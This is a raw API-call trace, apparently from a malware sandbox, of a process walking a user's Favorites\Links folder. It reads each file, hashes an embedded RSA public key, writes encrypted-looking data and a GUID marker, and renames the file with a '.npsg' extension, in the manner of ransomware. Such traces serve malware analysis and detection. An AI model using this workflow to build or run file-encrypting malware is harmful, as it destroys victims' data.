[0237.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0237.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400740 | out: hHeap=0x620000) returned 1 [0237.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b830 [0237.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400770 | out: hHeap=0x620000) returned 1 [0237.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b94b10 [0237.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7ba60 [0237.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0237.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7bb78 [0237.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34006e0 | out: hHeap=0x620000) returned 1 [0237.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x346fa10 [0237.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0237.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x3384ae0 [0237.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0237.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0237.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0237.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3384ae0 | out: hHeap=0x620000) returned 1 [0237.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0237.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0237.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94b10 | out: hHeap=0x620000) returned 1 [0237.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0237.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0237.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400710 | out: hHeap=0x620000) returned 1 [0237.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0237.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400758 | out: hHeap=0x620000) returned 1 [0237.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0237.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34006f8 | out: hHeap=0x620000) returned 1 [0237.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34006c8 | out: hHeap=0x620000) returned 1 [0237.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0237.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0237.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0237.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34006b0 | out: hHeap=0x620000) returned 1 [0237.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34093f8 | out: hHeap=0x620000) returned 1 [0237.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0237.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0237.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0237.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0237.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0237.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0237.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0237.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0237.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0237.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0237.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0237.720] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0xe7, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb14*=0xe7, lpOverlapped=0x0) returned 1 [0237.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0237.720] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xec, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.720] WriteFile (in: hFile=0x644, lpBuffer=0x6affc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x6affc0*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0237.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0237.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x346fa10 [0237.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x346fa10, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0237.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b83cd0 [0237.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.720] WriteFile (in: hFile=0x644, lpBuffer=0x3b83cd0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b83cd0*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0237.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0237.720] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.720] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0237.721] CloseHandle (hObject=0x644) returned 1 [0237.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e728 [0237.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x3b83cd0 [0237.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e728 | out: hHeap=0x620000) returned 1 [0237.723] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url.npsg")) returned 1 [0237.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0237.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.724] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0237.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e690 | out: hHeap=0x620000) returned 1 [0237.725] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 1 [0237.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e690 [0237.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.725] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url") returned=".url" [0237.725] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0237.726] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=226) returned 1 [0237.726] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0237.728] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xbc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.728] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0237.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.729] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0237.729] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0xe2, lpOverlapped=0x0) returned 1 [0237.729] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0237.729] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.729] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.729] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0237.730] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0237.730] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0237.730] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0237.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0237.730] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0237.730] GetLastError () returned 0x0 [0237.730] CryptDestroyHash (hHash=0x33f0408) returned 1 [0237.730] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0237.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0237.730] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0237.731] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0237.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.731] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0237.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe0) returned 0x33fd6b0 [0237.731] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0237.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0237.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0237.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0237.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0237.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x34093f8 [0237.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34006b0 [0237.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3409440 [0237.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34006c8 [0237.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34006f8 [0237.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400758 [0237.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400710 [0237.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0237.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0237.731] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0237.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0237.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34006f8 | out: hHeap=0x620000) returned 1 [0237.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400710 | out: hHeap=0x620000) returned 1 [0237.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400758 | out: hHeap=0x620000) returned 1 [0237.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0237.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400758 [0237.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0237.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400710 [0237.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0237.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x34006f8 [0237.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0237.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b948 [0237.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0237.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0237.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0237.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7ba60 [0237.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0237.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0237.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0237.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400710 | out: hHeap=0x620000) returned 1 [0237.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0237.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34006f8 | out: hHeap=0x620000) returned 1 [0237.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0237.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0237.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400758 | out: hHeap=0x620000) returned 1 [0237.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0237.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0237.732] GetCurrentThreadId () returned 0x5b4 [0237.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0237.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b82828 [0237.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0237.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0237.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x340dd38 [0237.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0237.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0237.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0237.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.733] GetCurrentThreadId () returned 0x5b4 [0237.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x33c2ee8 [0237.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0237.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33c2ee8 [0237.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0237.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0237.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0237.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0237.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400758 [0237.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0237.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0237.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0237.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0237.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0237.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0237.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34006f8 [0237.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0237.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0237.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.734] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xe2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.734] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0237.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0237.734] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.734] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0237.734] CloseHandle (hObject=0x644) returned 1 [0237.735] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url.npsg")) returned 1 [0237.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0237.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.736] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0237.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e690 | out: hHeap=0x620000) returned 1 [0237.737] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, 